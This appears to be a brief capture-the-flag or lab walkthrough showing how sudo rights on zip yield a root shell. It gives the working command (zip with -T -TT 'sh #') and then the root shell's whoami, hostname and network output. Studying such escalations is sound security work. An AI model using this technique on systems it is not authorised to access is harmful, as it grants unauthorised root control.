zip
zip can be abused for privilege escalation if run as superuser by sudo
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo -u root /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 31%)
# whoami
root
# hostname
ubuntu
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:e6:f7:17:b3:d5 brd ff:ff:ff:ff:ff:ff
inet 10.10.198.73/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::e6:f7ff:fe17:b3d5/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise